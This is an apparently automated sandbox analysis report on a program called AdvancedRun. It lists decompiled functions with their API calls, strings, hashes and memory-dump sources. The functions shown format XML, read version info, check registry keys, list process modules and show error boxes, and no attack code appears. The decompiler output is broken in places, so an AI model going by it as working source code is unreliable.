                                                                  Similarity
                                                                  • API ID: wcscat$_snwprintfmemset
                                                                  • String ID: %2.2X
                                                                  • API String ID: 2521778956-791839006
                                                                  • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                  • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                  • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                  • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 42%
                                                                  			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                  				void _v514;
                                                                  				char _v516;
                                                                  				void _v1026;
                                                                  				char _v1028;
                                                                  				void* __esi;
                                                                  				intOrPtr* _t16;
                                                                  				void* _t19;
                                                                  				intOrPtr* _t29;
                                                                  				char* _t31;
                                                                  
                                                                  				_t29 = __ecx;
                                                                  				_v516 = 0;
                                                                  				memset( &_v514, 0, 0x1fc);
                                                                  				_v1028 = 0;
                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                  				_t16 = _t29;
                                                                  				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                  					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                  				} else {
                                                                  					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                  				}
                                                                  				E00407343(_t16);
                                                                  				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                  				_t31 =  &_v516;
                                                                  				E00407250(_t31, _t19);
                                                                  				_push(_t31);
                                                                  				_push(L"<%s>\r\n");
                                                                  				_push(0xff);
                                                                  				_push( &_v1028);
                                                                  				L0040B1EC();
                                                                  				return E00407343(_t29, _a4,  &_v1028);
                                                                  			}

                                                                  Strings
                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                  • <%s>, xrefs: 00407DF3
                                                                  • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf
                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                  • API String ID: 3473751417-2880344631
                                                                  • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                  • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                  • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                  • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 70%
                                                                  			E00403B3C(intOrPtr _a4) {
                                                                  				void _v526;
                                                                  				char _v528;
                                                                  				void _v2574;
                                                                  				char _v2576;
                                                                  				void* __edi;
                                                                  				intOrPtr _t29;
                                                                  
                                                                  				_v2576 = 0;
                                                                  				memset( &_v2574, 0, 0x7fe);
                                                                  				_v528 = 0;
                                                                  				memset( &_v526, 0, 0x208);
                                                                  				E00404AD9( &_v528);
                                                                  				_push( &_v528);
                                                                  				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                  				_push(0x3ff);
                                                                  				_push( &_v2576);
                                                                  				L0040B1EC();
                                                                  				_t37 = _a4 + 0xa68;
                                                                  				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                  				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                  				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                  				_t29 = E0040467A(_t37);
                                                                  				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                  				return _t29;
                                                                  			}










                                                                  APIs
                                                                  • memset.MSVCRT ref: 00403B5D
                                                                  • memset.MSVCRT ref: 00403B76
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • _snwprintf.MSVCRT ref: 00403B9F
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                    • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                    • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                    • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                  • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                  • API String ID: 1832587304-479876776
                                                                  • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                  • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                  • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                  • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                  				void* _v8;
                                                                  				int _v12;
                                                                  				short _v524;
                                                                  				char _v1036;
                                                                  				void* __edi;
                                                                  
                                                                  				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                  				wcscat( &_v524, _a8);
                                                                  				wcscat( &_v524, "\\");
                                                                  				wcscat( &_v524, _a12);
                                                                  				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                  					return 0;
                                                                  				}
                                                                  				_t34 =  &_v1036;
                                                                  				E00404923(0xff,  &_v1036, _v8);
                                                                  				E004049A2(_t34, __esi);
                                                                  				return 1;
                                                                  			}









                                                                  APIs
                                                                  • wcscpy.MSVCRT ref: 0040AFD3
                                                                  • wcscat.MSVCRT ref: 0040AFE2
                                                                  • wcscat.MSVCRT ref: 0040AFF3
                                                                  • wcscat.MSVCRT ref: 0040B002
                                                                  • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                    • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                  • String ID: \StringFileInfo\
                                                                  • API String ID: 393120378-2245444037
                                                                  • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                  • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                  • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                  • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfwcscpy
                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                  • API String ID: 999028693-502967061
                                                                  • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                  • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                  • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                  • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 38%
                                                                  			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                  				void* _v0;
                                                                  				intOrPtr _v4;
                                                                  				intOrPtr _v8;
                                                                  				unsigned int _v12;
                                                                  				void* _v16;
                                                                  				char _v20;
                                                                  				char _v24;
                                                                  				intOrPtr _v32;
                                                                  				intOrPtr _v36;
                                                                  				intOrPtr _v44;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr _t58;
                                                                  				void* _t59;
                                                                  				void* _t69;
                                                                  				void* _t72;
                                                                  				intOrPtr _t78;
                                                                  				void _t89;
                                                                  				signed int _t90;
                                                                  				int _t98;
                                                                  				signed int _t105;
                                                                  				signed int _t106;
                                                                  				void* _t109;
                                                                  
                                                                  				_t106 = _t105 & 0xfffffff8;
                                                                  				E0040B550(0x8874, __ecx);
                                                                  				_t98 = 0;
                                                                  				_a8 = 0;
                                                                  				if(E00404BD3() == 0) {
                                                                  					L12:
                                                                  					__eflags =  *0x4101b8 - _t98; // 0x0
                                                                  					if(__eflags != 0) {
                                                                  						_t89 = _a4;
                                                                  						_t58 =  *0x40f83c(8, _t89);
                                                                  						__eflags = _t58 - 0xffffffff;
                                                                  						_v8 = _t58;
                                                                  						if(_t58 != 0xffffffff) {
                                                                  							_v0 = 1;
                                                                  							_a560 = 0x428;
                                                                  							_t59 =  *0x40f834(_t58,  &_a560);
                                                                  							while(1) {
                                                                  								__eflags = _t59;
                                                                  								if(_t59 == 0) {
                                                                  									goto L18;
                                                                  								}
                                                                  								memset( &_a8, _t98, 0x21c);
                                                                  								_a12 = _a580;
                                                                  								_a8 = _t89;
                                                                  								wcscpy( &_a16,  &_a1096);
                                                                  								_a540 = _a576;
                                                                  								_t106 = _t106 + 0x14;
                                                                  								_a544 = _a572;
                                                                  								_a552 = 0x428;
                                                                  								_t69 = E00409510(_a8,  &_a8);
                                                                  								__eflags = _t69;
                                                                  								if(_t69 != 0) {
                                                                  									_t59 =  *0x40f830(_v16,  &_a552);
                                                                  									continue;
                                                                  								}
                                                                  								goto L18;
                                                                  							}
                                                                  							goto L18;
                                                                  						}
                                                                  					}
                                                                  				} else {
                                                                  					_t109 =  *0x4101bc - _t98; // 0x0
                                                                  					if(_t109 == 0) {
                                                                  						goto L12;
                                                                  					} else {
                                                                  						_t72 = OpenProcess(0x410, 0, _a4);
                                                                  						_v0 = _t72;
                                                                  						if(_t72 != 0) {
                                                                  							_push( &_a4);
                                                                  							_push(0x8000);
                                                                  							_push( &_a2160);
                                                                  							_push(_t72);
                                                                  							if( *0x40f840() != 0) {
                                                                  								_t6 =  &_v12;
                                                                  								 *_t6 = _v12 >> 2;
                                                                  								_v8 = 1;
                                                                  								_t90 = 0;
                                                                  								if( *_t6 != 0) {
                                                                  									while(1) {
                                                                  										_a1616 = _t98;
                                                                  										memset( &_a1618, _t98, 0x208);
                                                                  										memset( &_a8, _t98, 0x21c);
                                                                  										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                  										_t106 = _t106 + 0x18;
                                                                  										_a8 = _a4;
                                                                  										_a12 = _t78;
                                                                  										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                  										E0040920A( &_v0,  &_a1600);
                                                                  										_push(0xc);
                                                                  										_push( &_v20);
                                                                  										_push(_v4);
                                                                  										_push(_v32);
                                                                  										if( *0x40f844() != 0) {
                                                                  											_a508 = _v32;
                                                                  											_a512 = _v36;
                                                                  										}
                                                                  										if(E00409510(_a8,  &_v24) == 0) {
                                                                  											goto L18;
                                                                  										}
                                                                  										_t90 = _t90 + 1;
                                                                  										if(_t90 < _v44) {
                                                                  											_t98 = 0;
                                                                  											__eflags = 0;
                                                                  											continue;
                                                                  										} else {
                                                                  										}
                                                                  										goto L18;
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  							L18:
                                                                  							CloseHandle(_v16);
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return _a8;
                                                                  			}


























                                                                  0x0040938d
                                                                  0x0040939d
                                                                  0x004093a5
                                                                  0x004093ac
                                                                  0x004093b4
                                                                  0x004093c5
                                                                  0x004093c9
                                                                  0x004093da
                                                                  0x004093df
                                                                  0x004093e5
                                                                  0x004093e6
                                                                  0x004093ea
                                                                  0x004093f6
                                                                  0x004093fc
                                                                  0x00409407
                                                                  0x00409407
                                                                  0x0040941d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409423
                                                                  0x00409428
                                                                  0x00409375
                                                                  0x00409375
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040942e
                                                                  0x00000000
                                                                  0x00409428
                                                                  0x00409377
                                                                  0x0040936d
                                                                  0x004094fb
                                                                  0x004094ff
                                                                  0x004094ff
                                                                  0x00409337
                                                                  0x0040931c
                                                                  0x0040950f

APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
• memset.MSVCRT ref: 0040938D
• memset.MSVCRT ref: 0040939D
  • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
• memset.MSVCRT ref: 00409488
• wcscpy.MSVCRT ref: 004094A9
• CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
Memory Dump Source
• Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3300951397-0
• Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
• Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
• Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
• Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 44%
E00402EC8(void* __ebx) {
    struct tagRECT _v20;
    struct tagPAINTSTRUCT _v84;

    GetClientRect( *(__ebx + 0x10),  &_v20);
    _v20.left = _v20.right - GetSystemMetrics(0x15);
    _v20.top = _v20.bottom - GetSystemMetrics(0x14);
    asm("movsd");
    asm("movsd");
    asm("movsd");
    asm("movsd");
    DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
    return EndPaint( *(__ebx + 0x10),  &_v84);
}

APIs
Memory Dump Source
• Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
Similarity
• API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
• String ID:
• API String ID: 19018683-0
• Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
• Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
• Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
• Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 50%
E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
    void _v514;
    signed short _v516;
    signed short* _t34;
    signed int _t37;
    void* _t40;
    signed short* _t44;
    void* _t46;

    _t40 = __edi;
    E00407343(__edi, _a4, L"<item>\r\n");
    _t37 = 0;
    if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
        do {
            _v516 = _v516 & 0x00000000;
            memset( &_v514, 0, 0x1fc);
            E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
            _t44 =  &_v516;
            E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
            _t34 = _t44;
            _push(_t34);
            _push( *((intOrPtr*)(__edi + 0x64)));
            _push(_t34);
            _push(L"<%s>%s</%s>\r\n");
            _push(0x2000);
            _push( *((intOrPtr*)(__edi + 0x68)));
            L0040B1EC();
            _t46 = _t46 + 0x24;
            E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
            _t37 = _t37 + 1;
        } while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
    }
    return E00407343(_t40, _a4, L"</item>\r\n");
}

APIs
• memset.MSVCRT ref: 004079DB
  • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
• _snwprintf.MSVCRT ref: 00407A25
Strings
Memory Dump Source
• Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
Similarity
• API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 1775345501-2769808009
• Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
• Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
• Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
• Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 64%
E0040467A(void* __edi) {
    signed int _v8;
    void* _v12;
    void* _v16;
    void _v2062;
    short _v2064;
    int _t16;

    _v8 = _v8 & 0x00000000;
    _t16 = E004043F8( &_v12, 0x20019);
    if(_t16 == 0) {
        _v2064 = _v2064 & _t16;
        memset( &_v2062, _t16, 0x7fe);
        _push(__edi + 0x20a);
        _push(L"%s\\shell\\%s");
        _push(0x3ff);
        _push( &_v2064);
        L0040B1EC();
        if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
            _v8 = 1;
            RegCloseKey(_v16);
        }
    }
    return _v8;
}

APIs
• memset.MSVCRT ref: 004046AF
• _snwprintf.MSVCRT ref: 004046CD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
Strings
Memory Dump Source
• Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
Similarity
• API ID: CloseOpen_snwprintfmemset
• String ID: %s\shell\%s
• API String ID: 1458959524-3196117466
• Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
• Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
• Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
• Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 16%
E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
    signed short _v131076;

    _t25 = __esi;
    E0040B550(0x20000, __ecx);
    if(_a4 == 0) {
        return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
    } else {
        if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
            _push(_a24);
        } else {
            _v131076 = _v131076 & 0x00000000;
            _push(__esi);
            _push(L"\"%s\"");
            _push(0xfffe);
            _push( &_v131076);
            L0040B1EC();
            _push(_a24);
            _push( &_v131076);
        }
        return WritePrivateProfileStringW(_a8, _a12, ??, ??);
    }
}

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 00409D79
                                                                  • _snwprintf.MSVCRT ref: 00409D9E
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 00409DD4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                  • String ID: "%s"
                                                                  • API String ID: 1343145685-3297466227
                                                                  • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                  • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                  • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                  • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                  Uniqueness
                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 38%
                                                                  			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                  				char _v2052;
                                                                  				short _v4100;
                                                                  				void* __edi;
                                                                  				long _t15;
                                                                  				long _t16;
                                                                  
                                                                  				_t15 = __ecx;
                                                                  				E0040B550(0x1000, __ecx);
                                                                  				_t16 = _t15;
                                                                  				if(_t16 == 0) {
                                                                  					_t16 = GetLastError();
                                                                  				}
                                                                  				E00404706(_t16,  &_v2052);
                                                                  				_push( &_v2052);
                                                                  				_push(_t16);
                                                                  				_push(L"Error %d: %s");
                                                                  				_push(0x400);
                                                                  				_push( &_v4100);
                                                                  				L0040B1EC();
                                                                  				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                  			}

                                                                  0x004047d2
                                                                  0x004047da
                                                                  0x004047e0
                                                                  0x004047e4
                                                                  0x004047ec
                                                                  0x004047ec
                                                                  0x004047f5
                                                                  0x00404800
                                                                  0x00404801
                                                                  0x00404802
                                                                  0x0040480d
                                                                  0x00404812
                                                                  0x00404813
                                                                  0x00404834

                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                  • _snwprintf.MSVCRT ref: 00404813
                                                                  • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                  • String ID: Error$Error %d: %s
                                                                  • API String ID: 313946961-1552265934
                                                                  • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                  • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                  • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                  • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                  Uniqueness
                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 90%
                                                                  			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                  				void* _v8;
                                                                  				signed int _v12;
                                                                  				void* __ebx;
                                                                  				void* __ecx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed int _t74;
                                                                  				signed int _t76;
                                                                  				signed short _t85;
                                                                  				signed int _t87;
                                                                  				intOrPtr _t88;
                                                                  				signed short _t93;
                                                                  				void* _t95;
